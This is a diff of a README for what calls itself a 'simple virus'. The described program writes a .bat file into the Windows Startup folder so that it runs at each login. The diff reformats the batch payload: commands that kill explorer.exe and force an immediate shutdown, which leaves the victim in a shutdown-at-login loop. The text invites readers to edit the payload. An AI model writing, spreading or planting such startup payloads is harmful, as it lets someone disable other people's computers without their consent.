Anonymous0Pro0hacker228/Startup_Virus/README.md

 Simple virus.
 It is creating .bat file in %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.

 You can easily edit it.
-By default, the file contains the following code:       `
+By default, the file contains the following code:       ` system %0 %0 taskkill /F /IM explorer.exe shutdown /s /t 1

-   +system %0 %0
-   +taskkill /F /IM explorer.exe
-   +shutdown /s /t 1
 `.
 Then it will shutdown ur computer.